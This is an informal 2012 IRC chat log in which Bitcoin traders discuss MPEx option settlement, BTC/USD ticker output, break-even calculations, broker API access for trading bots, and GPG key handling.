02:49:49 so what was the net of my option mr. smickles? Oct 27 02:51:02 ;;calc ((11 - [bc,24hprc]) / [bc,24hprc] - .0538765) * 48 Oct 27 02:51:03 0.77579570428 Oct 27 02:51:06 if done currently Oct 27 02:51:16 you still have a few minutes tho Oct 27 02:51:18 woot Oct 27 02:51:20 ;;bc,24hprc Oct 27 02:51:20 oh really Oct 27 02:51:20 10.28 Oct 27 02:51:21 ;;ticker Oct 27 02:51:22 BTCUSD ticker | Best bid: 10.18009, Best ask: 10.24999, Bid-ask spread: 0.06990, Last trade: 10.18008, 24 hour volume: 99436.59165322, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.31222 Oct 27 02:51:23 my alarm went off Oct 27 02:51:26 last hour Oct 27 02:51:37 isn't it utc 23:51 right now? Oct 27 02:51:46 yea Oct 27 02:51:50 heh Oct 27 02:51:53 ;;bc,24hprc Oct 27 02:51:54 10.28 Oct 27 02:53:27 thestringpuller: you're staring down the barrel of a 30% profit Oct 27 02:53:38 at mircea_popescu's expense Oct 27 02:53:48 haha i got bondholders Oct 27 02:53:54 oh yeah Oct 27 02:53:57 what volume we talkin' about ? Oct 27 02:54:12 <4 btc Oct 27 02:54:17 :D Oct 27 02:54:37 mircea_popescu: i gave thestringpuller a mini-margin thingy Oct 27 02:54:43 either the bondholders or the shareholders will feel the 30% of 4btc pain Oct 27 02:55:20 hahahah Oct 27 02:55:24 you guys make me happy Oct 27 02:55:30 I do feel like a won a bet though Oct 27 02:56:07 good for you. Oct 27 02:56:37 /sarcasm lol Oct 27 02:56:39 ;;ticker Oct 27 02:56:39 BTCUSD ticker | Best bid: 10.18025, Best ask: 10.24641, Bid-ask spread: 0.06616, Last trade: 10.18025, 24 hour volume: 99088.49020270, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.31053 Oct 27 02:57:34 mircea_popescu: MPEX is the coolest thing ever Oct 27 02:57:42 to happen to btc Oct 27 02:57:46 why ty. i am of the same persuasion. Oct 27 02:58:03 Such easy access to options lol Oct 27 02:59:05 the best thing to happen would be maintstream adoption... Oct 27 02:59:26 99% of the people only own 1% of the wealth Oct 27 02:59:33 why would wide spread adoption help? Oct 27 02:59:48 [MPEX] [S.MPOE] 16875 @ 0.00047242 = 7.9721 BTC [+] Oct 27 02:59:56 it's a currency... Oct 27 02:59:57 haha now that's a point Oct 27 03:00:12 BTC-Mining any guess as to what % of roman empire subjects ever touched a solidus ? Oct 27 03:00:17 you need like warren buffet and his friends to come in and "adopt it" Oct 27 03:00:21 like, in their lifetime. Oct 27 03:00:33 why would they adopt it if there's no market using it? Oct 27 03:00:48 market != consumer market. Oct 27 03:01:01 consumers don't have a lot of money Oct 27 03:01:39 They don't own a lot, but they spend a lot of what they have. Those who have a lot stash it. Oct 27 03:01:40 jurov https://bitcointalk.org/index.php?topic=118551.msg1299839#msg1299839 Oct 27 03:01:58 BTC-Mining in btc ? Oct 27 03:01:58 Consumers would help attract large businesses, who would then start accumulating bitcoins Oct 27 03:07:24 mircea yes i saw that. now am trying to explain how i feel about multifactor auth Oct 27 03:07:35 mircea_popescu: what was the official price at maturity for mpex options? Oct 27 03:08:20 10.27 Oct 27 03:08:46 jurov it's a dilemma you find yourself in there i guess Oct 27 03:09:17 ;;calc ((11 - 10.27) / 10.27 - .0538765) * 48 Oct 27 03:09:18 0.825807259981 Oct 27 03:09:26 it's either snake oil or expense i can't afford (buying yubikeys or sending sms) Oct 27 03:09:38 thestringpuller: should i use that same address, or do you want me to keep it on account for you? Oct 27 03:09:55 ;;calc ((11 - 10.27) / 10.27) * 48 Oct 27 03:09:56 3.41187925998 Oct 27 03:11:25 jurov on the other hand, browser sessions are vulnerable. Oct 27 03:12:28 but i think a honest rundown of the thing is prolly the best policy. "here is what i can do, here is what i can't do. if you actually handle enough cash that you need what i can't do, talk to mpex directly and problem solved" Oct 27 03:16:13 for the record, month close happend on 1351296001 Oct 27 03:16:20 within the fucken second ALL OF IT Oct 27 03:19:13 jurov: Oct 27 03:19:19 how do we get quick deposits/ Oct 27 03:19:20 ?* Oct 27 03:20:16 copumpkin now moo like a bull Oct 27 03:21:45 gender equality. Oct 27 03:21:54 lol Oct 27 03:22:32 mircea_popescu: are mpex deposits automated? Oct 27 03:22:43 nope Oct 27 03:22:58 you do them manually Oct 27 03:23:00 ?* Oct 27 03:23:01 ;;ticker Oct 27 03:23:02 BTCUSD ticker | Best bid: 10.15000, Best ask: 10.19996, Bid-ask spread: 0.04996, Last trade: 10.15000, 24 hour volume: 98610.17306644, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.30583 Oct 27 03:23:19 thestringpuller, only possible way i know is to have some reserve (or margin) on MPEx that can be used immediately Oct 27 03:23:39 allocated to your account Oct 27 03:24:18 how long does an mpex deposit usually take? Oct 27 03:25:04 [MPEX] [S.MPOE] 1225 @ 0.00047242 = 0.5787 BTC [+] Oct 27 03:25:05 iirc it may be more than 6 hours Oct 27 03:25:05 [MPEX] [S.MPOE] 13475 @ 0.00047548 = 6.4071 BTC [+] Oct 27 03:25:46 thestringpuller the declared limit is 2 days. it usually takes significantly less. Oct 27 03:26:11 i do such "quick deposits" already for those 1btc users but i guess you want more Oct 27 03:26:37 i'm seeing if I want to go direct to mpex Oct 27 03:26:44 or dump a bunch of money into coinbr Oct 27 03:28:11 if you are going to do many transactions, coinbr will help you keep overview Oct 27 03:28:29 otherwise you need to keep it in spreadsheet Oct 27 03:29:54 if I were to generate a high enough volume could I get margin to cover "quick deposits"? Oct 27 03:29:59 thestringpuller in general the capital is the key criterion. if you plan to do k's of btc you probably want mpex. if you plan to do 10s of btc you prolly want coinbr. if hundreds it's messier. Oct 27 03:30:22 hundreds...:\ Oct 27 03:30:29 maybe thousands one day Oct 27 03:31:16 then i guess you'll have to weigh them Oct 27 03:33:12 if i were to do this longterm what would your reccomendation be? Oct 27 03:33:47 glbse Oct 27 03:33:51 wait nm. Oct 27 03:34:47 nice joke Oct 27 03:34:49 :P Oct 27 03:34:50 lol Oct 27 03:35:53 :p Oct 27 03:35:57 my sense of humour. Oct 27 03:36:27 you'll be my special customer. I'm going to cater to your whims (no phonesex, tho) Oct 27 03:36:37 LOL Oct 27 03:36:46 y u no cybersex! Oct 27 03:36:58 So you can be my mini broker jurov ? Oct 27 03:37:05 thestringpuller ask him to get rid of css on coinbr :D Oct 27 03:37:35 thestringpuller, yes i can Oct 27 03:37:42 hahaha Oct 27 03:37:44 get rid of css Oct 27 03:37:51 I really want the access to the api Oct 27 03:37:55 cause I can make bots easily Oct 27 03:38:03 then my computer is my broker Oct 27 03:38:04 lol Oct 27 03:39:23 as long as you don't expect to do X transactions per second or more, then it's possible Oct 27 03:39:57 Ideally I would like to make trades without a website in honesty Oct 27 03:41:12 if you can make that happen jurov then it'll be worthwhile Oct 27 03:41:23 if not the ~30 btc fee isn't that bad Oct 27 03:42:05 up to you, what you can provide Oct 27 03:42:06 OK, exporting json interface should not be a problem. i planned to do one anyway for mod6's adroid app Oct 27 03:42:46 cool, I won't flood it, i just want bot access because I can't be awake 24/7 Oct 27 03:44:04 so i guess you need to submit order/cancel/exercise, right? Oct 27 03:45:14 any more data? everything other you'll use via browser? Oct 27 03:50:15 [MPEX] [S.MPOE] 19651 @ 0.00047232 = 9.2816 BTC [-] Oct 27 03:50:15 [MPEX] [S.MPOE] 22600 @ 0.00047189 = 10.6647 BTC [-] Oct 27 03:50:17 [MPEX] [S.MPOE] 10336 @ 0.00047171 = 4.8756 BTC [-] Oct 27 04:14:44 good night Oct 27 04:15:53 [MPEX] [S.MPOE] 44968 @ 0.00047257 = 21.2505 BTC [+] Oct 27 04:26:43 thestringpuller: it turns out that the official number is 10.28, not 10.27 Oct 27 04:27:17 ;;calc ((11 - 10.28) / 10.28) * 48 Oct 27 04:27:17 3.36186770428 Oct 27 04:30:38 either way i made cash Oct 27 04:30:39 lol Oct 27 04:32:11 thestringpuller: do you have a WoT identity? Oct 27 04:38:41 lol Oct 27 04:39:37 0_o Oct 27 04:39:45 jurov: https://github.com/jurov/MPExAgent :D Oct 27 04:43:23 [MPEX] [S.MPOE] 1182 @ 0.00047257 = 0.5586 BTC [+] Oct 27 04:43:25 [MPEX] [S.MPOE] 14518 @ 0.00047171 = 6.8483 BTC [-] Oct 27 04:44:08 s.mpoe statement is out : http://trilema.com/2012/mpoe-october-2012-statement/ Oct 27 04:50:20 [MPEX] [S.MPOE] [PAID] 1000000000 @ 0.00000063 = 630.31566629 BTC Oct 27 05:08:37 [MPEX] [S.MPOE] 14846 @ 0.00047171 = 7.003 BTC [-] Oct 27 05:08:38 [MPEX] [S.MPOE] 20302 @ 0.00047157 = 9.5738 BTC [-] Oct 27 05:27:24 ;;ticker Oct 27 05:27:24 BTCUSD ticker | Best bid: 9.88026, Best ask: 9.96973, Bid-ask spread: 0.08947, Last trade: 9.97986, 24 hour volume: 98509.23509746, 24 hour low: 9.74000, 24 hour high: 10.95000, 24 hour vwap: 10.26302 Oct 27 05:35:08 [MPEX] [S.MPOE] 6898 @ 0.00047157 = 3.2529 BTC [-] Oct 27 05:35:09 [MPEX] [S.MPOE] 20685 @ 0.00047066 = 9.7356 BTC [-] Oct 27 05:35:10 [MPEX] [S.MPOE] 24217 @ 0.00047 = 11.382 BTC [-] Oct 27 05:43:53 nighty all! **** ENDING LOGGING AT Sat Oct 27 05:45:09 2012 **** BEGIN LOGGING AT Sat Oct 27 11:42:43 2012 Oct 27 11:53:02 any ideas what is going on with the BTC price? Oct 27 11:54:19 bitinstant closed down ; some other service closed down Oct 27 11:54:31 some people added significant hashpower and are probably selling the btc Oct 27 11:54:39 Network total 31.378 Thash/s Oct 27 11:54:49 went up 25% past few days Oct 27 11:56:53 are ASIC test versions coming online? Oct 27 11:57:35 possibly. Oct 27 11:59:48 bitinstant? in google search I can see "BitInstant.com is currently down due to site revisions. All orders placed up to this point will process as normal. If you have any questions or issues feel free to ..." but when I go to the site, it looks OK Oct 27 12:01:10 yea, i think they may be up already Oct 27 12:01:23 but the point is, two things take out usd from mkt, one thing adds more btc Oct 27 12:01:30 price has to plumet. supply and demand. Oct 27 12:06:04 [MPEX] [S.MPOE] 26700 @ 0.00046754 = 12.4833 BTC [-] Oct 27 12:09:51 jurov mod6 statjson now includes exercises list too. Oct 27 12:19:54 mircea_popescu: Is the absense of recallable transaction history strategic, or just "haven't gotten to it"? Oct 27 12:20:14 what do you mean recallable transaction history ? Oct 27 12:20:34 Can I right now view all of my October transactions? Oct 27 12:20:46 if you kept all your october stats responses Oct 27 12:20:55 or if you never issued a stat in october, issue one and it's there Oct 27 12:20:57 heh, ya, that's what I mean. Oct 27 12:21:09 ya, mpex is not doing your accounting, you have to do that part yourself. Oct 27 12:21:44 (or use a broker that offers that service) Oct 27 12:22:42 How about transactions showing the exercise of options at expiration? Planned, or DIY? Oct 27 12:23:27 this was just added in the statjson Oct 27 12:23:53 the plain stat is scheduled for an overhaul, but this won't happen for a while yet to give people who are using it atm to provide 3rd party services to migrate to statjson first Oct 27 12:24:28 ok, I'll look at statjson. Oct 27 12:25:16 so did they let roger ver go yet ? anyone know ? Oct 27 12:26:16 Enroute to HK, though may still need to return to JP. Oct 27 12:26:23 aha Oct 27 12:26:48 people keep fearmongering re the us government, but my intel shows the chinese govt will be our real enemy. Oct 27 12:31:28 [MPEX] [S.MPOE] 3636 @ 0.00046754 = 1.7 BTC [-] Oct 27 12:31:29 [MPEX] [S.MPOE] 9451 @ 0.00046727 = 4.4162 BTC [-] Oct 27 12:31:31 [MPEX] [S.MPOE] 22313 @ 0.00046693 = 10.4186 BTC [-] Oct 27 12:36:36 https://bitcointalk.org/index.php?topic=120758.0 << also worthy of notice. one can now make his own copies of mpex db Oct 27 12:36:38 sgornick ^^ Oct 27 12:49:29 [MPEX] [O.BTCUSD.C120T] 5 @ 0.1 = 0.5 BTC [-] Oct 27 12:49:31 [MPEX] [O.BTCUSD.C120T] 5 @ 0.09390123 = 0.4695 BTC [-] Oct 27 12:50:27 [MPEX] [O.BTCUSD.P120T] 7 @ 0.26 = 1.82 BTC [+] Oct 27 12:54:06 [MPEX] [O.BTCUSD.C120T] 3 @ 0.09388415 = 0.2817 BTC [-] Oct 27 12:55:03 ;;ticker Oct 27 12:55:03 BTCUSD ticker | Best bid: 10.27935, Best ask: 10.30000, Bid-ask spread: 0.02065, Last trade: 10.27935, 24 hour volume: 99354.61716662, 24 hour low: 9.74000, 24 hour high: 10.79978, 24 hour vwap: 10.20092 Oct 27 13:03:06 https://ferroh.com/charts pretty cool Oct 27 13:03:40 but those darn options Oct 27 13:03:48 lol what about them ? Oct 27 13:04:04 there fun to look at and think about Oct 27 13:04:36 ehehe Oct 27 13:08:30 mircea_popescu: you know, i've been wondering, if someone setup a short straddle at the money with something like 20000 contracts on each leg, do you think it would stabilize the exchange rate for a while? Oct 27 13:08:54 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.96946805 = 969.4681 BTC [+] Oct 27 13:08:57 possibly. Oct 27 13:09:22 inasmuch as if they would have otherwise sold/bought on the mtgox market for sure. Oct 27 13:11:11 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.87084465 = 870.8447 BTC [+] Oct 27 13:11:27 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.77222124 = 772.2212 BTC [+] Oct 27 13:11:38 woah Oct 27 13:11:40 [MPEX] [O.BTCUSD.P170T] 1000 @ 0.67359784 = 673.5978 BTC [+] Oct 27 13:11:43 those are real? Oct 27 13:11:48 heh table investor. Oct 27 13:12:01 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.57497444 = 574.9744 BTC [+] Oct 27 13:12:01 i guess someone figures the btc goes up. Oct 27 13:12:22 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.47635104 = 476.351 BTC [+] Oct 27 13:13:02 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.40221678 = 402.2168 BTC [+] Oct 27 13:13:18 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.33756736 = 337.5674 BTC [-] Oct 27 13:13:32 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.27658406 = 276.5841 BTC [+] Oct 27 13:14:02 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.22015212 = 220.1521 BTC [+] Oct 27 13:14:21 nice way to start the month Oct 27 13:14:27 now i can be worried sick for the next five weeks ;/ Oct 27 13:15:01 ;;calc 12 / ((.27658406 * .998) +1) Oct 27 13:15:02 9.40416104058 Oct 27 13:15:44 ;;calc 11 / ((.22015212 * .998) +1) Oct 27 13:15:45 9.01852376756 Oct 27 13:16:04 ;;calc 13 / ((.33756736 * .998) +1) Oct 27 13:16:05 9.72404488124 Oct 27 13:16:42 ;;calc 14 / ((.40221678 * .998) +1) Oct 27 13:16:42 9.98992197804 Oct 27 13:17:01 what's that like inverse premium ? Oct 27 13:17:06 ;;calc 15 / ((.47635104 * .998) +1) Oct 27 13:17:06 10.166745898 Oct 27 13:17:21 should be breakeve numbers (in usd) Oct 27 13:17:51 ;;calc 16 / ((.57497444 * .998) +1) Oct 27 13:17:52 10.1663178393 Oct 27 13:18:11 ;;calc 17 / ((.67359784 * .998) +1) Oct 27 13:18:11 these were sales tho Oct 27 13:18:11 10.1659401704 Oct 27 13:18:28 ;;calc 18 / ((.77222124 * .998) +1) Oct 27 13:18:28 10.1656044882 Oct 27 13:18:36 it hit the bid price across the board Oct 27 13:18:42 ;;calc 19 / ((.87084465 * .998) +1) Oct 27 13:18:42 10.1653041055 Oct 27 13:18:54 ;;calc 20 / ((.96946805 * .998) +1) Oct 27 13:18:54 10.1650338278 Oct 27 13:21:55 ;;calc 9.40416104058+9.01852376756+9.72404488124+9.98992197804+10.166745898+10.1663178393+10.1659401704+10.1656044882+10.1653041055+10.1650338278 Oct 27 13:21:56 99.1315979966 Oct 27 13:22:17 so they make btc down to 9.14 Oct 27 13:23:27 yea, if it doesn't kiss nine they're golden. Oct 27 13:23:46 then again... month is long. Oct 27 13:23:48 ballzy Oct 27 13:24:27 mircea_popescu: does you bot adjust based on what it has bought and holds? Oct 27 13:24:33 if it's one of the people who sold a lot in the dump it makes sense Oct 27 13:24:37 smickles no. Oct 27 13:25:02 wow, shouldn't it? Oct 27 13:25:48 why ? Oct 27 13:26:53 shouldn't it adjust prices to try to acheive the most time resistant neutral position?, that way you can take advantage of the imbalance in the bot's portfolio and offer better prices to the opposing positions and worse prices to the ones that add more risk to you Oct 27 13:27:23 how would it know what's more time-resistant neutral position ? Oct 27 13:27:44 the greeks, assuming you have a volatility estimate Oct 27 13:27:48 i don't want to introduce feedback. Oct 27 13:28:01 atm i have the capital to anchor. if it becomes a problem and the bot is too often sold out Oct 27 13:28:15 then i'd prolly prefer adding more capital than following the mkt Oct 27 13:29:34 what you're saying does make sense, in general. just, btc is yet too low volume and i don't trust half the quant analysis results Oct 27 13:29:43 and i also don't know which half i don't trust. Oct 27 13:30:36 you wouldn't need to trust either, you should be able to encourage people to buy and sell your bot into a positon that makes btc when the market moves up down or sideways Oct 27 13:31:14 like right now, with this idea, it should offer a worse price for all those puts, and a better price on the related calls Oct 27 13:31:37 the rational thing for people to do is go in the midmarket imo Oct 27 13:32:12 i mean, if you believe this you can go put your own CALL offers in there, neh ? Oct 27 13:33:20 well, it doesn't work so well if you run out of capital to hedge with :( Oct 27 13:33:40 so start a fund :p Oct 27 13:34:16 well, i suppose i do already have half of the code for just such a bot already written Oct 27 13:34:26 what's this statjson i heard mentioned? Oct 27 13:34:50 you know... stat in json Oct 27 13:36:18 so Oct 27 13:36:19 whatsup Oct 27 13:36:48 mircea_popescu: so i could parse the stat easily? Oct 27 13:36:53 i might make this bot then Oct 27 13:37:33 how do i get at it? Oct 27 13:37:36 Diablo-D3: hiya Oct 27 13:38:09 anything interesting happen? Oct 27 13:39:21 [MPEX] [S.MPOE] 1971 @ 0.00046693 = 0.9203 BTC [-] Oct 27 13:40:58 mircea_popescu: check out these lovely formulas http://en.wikipedia.org/w/index.php?title=Greeks_(finance)#Formulas_for_vanilla_option_Greeks Oct 27 13:41:10 Diablo-D3: a bitinstant guy was detained Oct 27 13:41:57 lol, it went out of scale: http://bitcoin.sipa.be/speed-lin-2k.png Oct 27 13:42:03 smickles: er, why? Oct 27 13:42:39 Diablo-D3: a stamp was in the wrong place, apparently Oct 27 13:42:47 wtf? Oct 27 13:42:51 jurov: awesome Oct 27 13:43:43 smickles: the hell? Oct 27 13:43:53 Diablo-D3: srsly Oct 27 13:44:31 a stamp for what? Oct 27 13:44:45 some sort of international travel thing Oct 27 13:48:50 ;;bc,diff Oct 27 13:48:50 3072321.7320208 Oct 27 13:48:55 ;;bc,stats Oct 27 13:48:56 Current Blocks: 205220 | Current Difficulty: 3072321.7320208 | Next Difficulty At Block: 205631 | Next Difficulty In: 411 blocks | Next Difficulty In About: 2 days, 15 hours, 14 minutes, and 54 seconds | Next Difficulty Estimate: 3265289.61742921 | Estimated Percent Change: 6.28084889018 Oct 27 14:04:39 [MPEX] [S.MPOE] 11900 @ 0.00046734 = 5.5613 BTC [+] Oct 27 14:05:14 smickles you go STATJSON lol Oct 27 14:05:50 ;;later tell btc-mining http://bitcoin.sipa.be/speed-lin-2k.png check this out going out of scale :D Oct 27 14:05:51 The operation succeeded. Oct 27 14:06:30 Diablo-D3 roger ver was detained in macau airport. apparently is on his way to hk atm Oct 27 14:06:48 spent about a day and a half in airport detention. maybe he pulled a nefario, it's unclear yet. Oct 27 14:10:35 heh Oct 27 14:11:31 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.96946805 = 969.4681 BTC [+] Oct 27 14:11:42 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.87084465 = 870.8447 BTC [+] Oct 27 14:11:45 o boy round 2 Oct 27 14:11:54 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.77222124 = 772.2212 BTC [+] Oct 27 14:12:23 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.57497444 = 574.9744 BTC [+] Oct 27 14:12:25 [MPEX] [O.BTCUSD.P170T] 1000 @ 0.67359784 = 673.5978 BTC [+] Oct 27 14:12:40 [MPEX] [O.BTCUSD.P150T] 1000 @ 0.47635104 = 476.351 BTC [+] Oct 27 14:12:53 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.40206278 = 402.0628 BTC [-] Oct 27 14:13:02 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.33741273 = 337.4127 BTC [-] Oct 27 14:13:36 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.27643033 = 276.4303 BTC [-] Oct 27 14:13:51 [MPEX] [O.BTCUSD.P110T] 1000 @ 0.22000167 = 220.0017 BTC [-] Oct 27 14:38:55 [MPEX] [S.MPOE] 10916 @ 0.00046693 = 5.097 BTC [-] Oct 27 14:38:57 [MPEX] [S.MPOE] 7784 @ 0.00046665 = 3.6324 BTC [-] Oct 27 14:41:36 hmmmm https://bitcointalk.org/index.php?topic=120759.0;topicseen Oct 27 14:42:15 SEC needs you Oct 27 14:48:08 Maybe Phil will even sign up and answer your questions (but that may be a conflict of interest for him). Oct 27 14:48:11 what da fuck ?! Oct 27 14:55:47 hm Oct 27 14:55:54 that's the guy who messaged me on bitcointalk Oct 27 14:56:55 "I also just got off the phone with Philip Moustakis. Nice guy. We chatted for about an hour." Oct 27 14:57:01 i find it incredible the guy finds the time. Oct 27 15:04:02 [MPEX] [S.MPOE] 12400 @ 0.00046734 = 5.795 BTC [+] Oct 27 15:04:03 [MPEX] [S.MPOE] 20635 @ 0.0004697 = 9.6923 BTC [+] Oct 27 15:04:47 ;;ticker Oct 27 15:04:47 BTCUSD ticker | Best bid: 10.41001, Best ask: 10.44000, Bid-ask spread: 0.02999, Last trade: 10.41000, 24 hour volume: 104809.98028766, 24 hour low: 9.74000, 24 hour high: 10.70000, 24 hour vwap: 10.20577 **** BEGIN LOGGING AT Sat Oct 27 19:31:34 2012 Oct 27 19:32:09 my guess was that with C100 and 10 usd strike break even would be 0.1 Oct 27 19:32:16 but i guess that's way off Oct 27 19:39:35 no, call option profits when price *rises*... when BTCUSD price is X, you will get (X-10)/X when exercising one C100 option Oct 27 19:40:45 [MPEX] [S.MPOE] 900 @ 0.00046707 = 0.4204 BTC [+] Oct 27 19:42:07 so if you buy now at 0.277 , the price must be larger than ~13.7 for you to profitably exercise Oct 27 19:43:38 ok, so for C110 it would be (x-11)/x Oct 27 19:44:48 yes Oct 27 19:45:41 and exact breakeven for calls is at strike/(1-buyprice) Oct 27 19:46:19 trying to figure out if it makes sense to buy options if i buy something with btc today (at a usd price), but in the end don't want to have less btc in my wallet, so buyin new btc few days later Oct 27 19:46:37 but expect price between now and in 4 days to rise Oct 27 19:47:13 if you expect price to rise then you want either long puts or short calls Oct 27 19:48:17 hmm.. what if i dont care which way prices go, i just want to have same amount of btc in the end Oct 27 19:48:41 but since fiat -> mtgox takes a while, i don't know how much fiat i have to send to mtgox Oct 27 19:49:02 so buying an insurance for price change would make sense Oct 27 19:49:46 but in what you say is implicit you do care which way prices go. that's why buying insurance for price changes makes sense. Oct 27 19:50:09 hmm.. ur right Oct 27 19:50:44 price falling would be nice for me anyway, rising price would get me less btc if i don't hv options Oct 27 19:51:43 right. Oct 27 19:51:55 mircea_popescu: Anticipating an "October results" post: in "Investing in Mircea Popescu's Options Emporium" http://bitcointalk.org/index.php?topic=64962.msg1230888#msg1230888 Oct 27 19:52:06 if i have 100 btc now, spend 10 btc now and coz current price is 10 usd i send 100 usd to mtgox which will arive in a few days Oct 27 19:52:16 mircea, why long puts in this case? they will get cheaper if btcusd rises, no? Oct 27 19:52:16 sgornick but the results are out since this morn ? Oct 27 19:52:32 jurov bah i fucked up. Oct 27 19:52:37 FabianB_ you want long calls/short puts Oct 27 19:52:45 dyslexia >< Oct 27 19:53:03 http://trilema.com/2012/mpoe-october-2012-statement/ << sgornick Oct 27 19:53:21 so if usd price is at 12 in 4 days i could calculate what kind of long call i should buy to insure that Oct 27 19:53:22 A good place for the results to also be posted would be in that thread. Oct 27 19:54:26 FabianB_, i guess none of currently offered mpoe calls will be profitable at 12 Oct 27 19:54:54 so options only make sens with big price changes? Oct 27 19:54:54 unless there's some gentlemen who creates some for you ar such price Oct 27 19:55:58 sgornick i guess you have a point. i recently switched my blog from romanian to english, so i kinda intend to make it the source for results. but i guess a link can't hurt anything. Oct 27 19:56:33 fabian, i'd rephrase it so that nobody dares to offer them at better price Oct 27 19:57:15 ;;ticker Oct 27 19:57:15 BTCUSD ticker | Best bid: 10.46505, Best ask: 10.51980, Bid-ask spread: 0.05475, Last trade: 10.46502, 24 hour volume: 96030.81201998, 24 hour low: 9.74000, 24 hour high: 10.83883, 24 hour vwap: 10.18519 Oct 27 19:57:18 ok, many ppl expect it to go towards 12 again Oct 27 19:57:23 ;;calc 8 / 12 Oct 27 19:57:24 0.666666666667 Oct 27 19:57:39 sell 1 O.BTCUSD.P200T for 0.96946805 atm Oct 27 19:57:51 at 12 they're only worth .66, meaning a 50% profit Oct 27 19:59:01 well, ~50 anyway Oct 27 19:59:34 but in general : big price swings are better served by long positions. fine price movements are better served by short positions. Oct 27 20:00:14 hmm Oct 27 20:00:16 ic Oct 27 20:03:56 so i guess on traditional forex options have smaller price differences, coz e.g. usd<->eur price changes are smaller Oct 27 20:06:40 [MPEX] [S.MPOE] 4900 @ 0.00046597 = 2.2833 BTC [-] Oct 27 20:06:51 yes volatility is a large consideration Oct 27 20:07:08 you don't often see eur gaining 5% over usd in 24 hours Oct 27 20:07:16 this has happened like i dunno, a dozen time in btc this year Oct 27 20:07:37 i'm in a bit of a risky mood and don't think price will be back at 12 in 4 days, would create approriate options for you as a proper broker would... but my head is spinning already Oct 27 20:07:40 yeah Oct 27 20:07:58 an important point tho is that you don't HAVE to take the bot offers Oct 27 20:08:04 you can put your own bids/asks in the midmarket too Oct 27 20:08:05 hehe, jurov, it was just an example now Oct 27 20:08:17 but maybe i'll get back to that jurov if i really need it Oct 27 20:09:03 so baked in is a convenience cost too. people don't seem to be doing nearly enough of their own offering, much prefering the instant execution of bot offer. Oct 27 20:10:29 thinking about if btc would be worth if i'm a producer of some goods e.g. in china, for shippment to eur/us, e.g. payment in btc now, shippment in europe arives 40 days later, btc price in that time probably moved a lot Oct 27 20:10:32 someday i ought to do myself few cups of extra strong coffee and do the maths... Oct 27 20:10:53 FabianB_ would most definitely be worth it in that scenario. Oct 27 20:11:18 cutting out the (significant) bank fees for letters of credit Oct 27 20:11:56 mircea_popescu: yeah, that's cutting the bank fees, but introduces the risk of volatility, if i don't use option insurance Oct 27 20:12:13 but out of the bank savings you can buy a lot of options insurance. Oct 27 20:12:22 and you get all the other advantages of btc Oct 27 20:12:31 probably Oct 27 20:12:47 (such as, for instance, if the company goes bankrupt you can't be clawbacked Oct 27 20:12:58 as the simplest and most common example) Oct 27 20:14:40 and instant transaction etc., can send the goods next day and not in 10 days when international wire arives.. Oct 27 20:14:56 most int'l commerce isn't paid by wire. Oct 27 20:15:15 mircea_popescu: what's the usual? Oct 27 20:15:22 letters of credit Oct 27 20:16:19 and then they do bulk transfer? Oct 27 20:16:36 what do you mean bulk transfer? Oct 27 20:16:53 well, credit needs to be executed some time Oct 27 20:17:25 ;;google letter of credit Oct 27 20:17:26 Letter of credit - Wikipedia, the free encyclopedia: ; Letter Of Credit Definition | Investopedia: ; Letter of Credit - How Letters of Credit Work: Oct 27 20:17:34 it's a system sorta similar to an escrow deal Oct 27 20:21:14 so the 3rd party (bank) just hands it over to some other bank, or buys currency at the forex market for it or something Oct 27 20:22:15 something like that Oct 27 20:23:16 probably has big fees too Oct 27 20:24:32 kinda, ya/ Oct 27 20:24:45 it's inconvenient and really mostly a relic from the pre ww2 days Oct 27 20:24:55 one of the first things bitcoin will be killing. Oct 27 20:25:09 provided, of course, the fucking chinese stop hussling people at macau. Oct 27 20:25:19 yeah, traditional banks suck at international money transfer Oct 27 20:25:52 is there more to read on that macau story? Oct 27 20:26:04 not afaik Oct 27 20:27:31 macau is like hong kong an SAR, so the chinese central gov shouldn't have much to do with it Oct 27 20:28:16 heh that's just a theory. in practice, they're very involved. Oct 27 20:28:33 well, depends on which kind of question Oct 27 20:29:55 https://bitcointalk.org/index.php?topic=81939.msg902620#msg902620 teh bitcoin history... Oct 27 20:32:08 [MPEX] [S.MPOE] 1608 @ 0.00046548 = 0.7485 BTC [-] Oct 27 20:36:46 sgornick https://bitcointalk.org/index.php?topic=120758.msg1301670#msg1301670 what do you mean ? Oct 27 20:38:49 mircea_popescu: If I used for trading on MPEx my main GPG key that I use for WoT (and has my e-mail address), can someone figure out what assets I own? Oct 27 20:39:14 not unless either some servers are seriously broken into or someone cracks gpg Oct 27 20:39:24 (or pgp) Oct 27 20:41:44 on the other hand, if you use a properly set up anon key nobody can ever figure it out, even if they owned all the servers in the world. Oct 27 20:42:39 (also, you can link to specific sections in the faq by c/p ing the question number link) Oct 27 20:44:44 > you can link to specific sections in the faq <-- Fixed. Oct 27 20:45:44 more like an "in general". that thing's monstrously large by now Oct 27 20:45:55 i'd much prefer something a page or two long but it doesn't seem possible Oct 27 20:50:09 lol Oct 27 20:55:58 mpex.py needs an option to specify which key to sign with -- for gpg.encrypt( , , sign=signer_fingerprint) Oct 27 20:56:29 add it :D Oct 27 20:57:36 [MPEX] [S.MPOE] 30430 @ 0.00046548 = 14.1646 BTC [-] Oct 27 20:57:37 [MPEX] [S.MPOE] 14270 @ 0.00046529 = 6.6397 BTC [-] Oct 27 20:59:46 sgornick, python-gnupg does not support that, sorry Oct 27 21:00:07 you can't select key ?! Oct 27 21:00:13 nope Oct 27 21:00:21 so if you have two which one does it pick ? Oct 27 21:00:30 the default one Oct 27 21:00:41 so then bash script to cyhange the default Oct 27 21:00:42 i 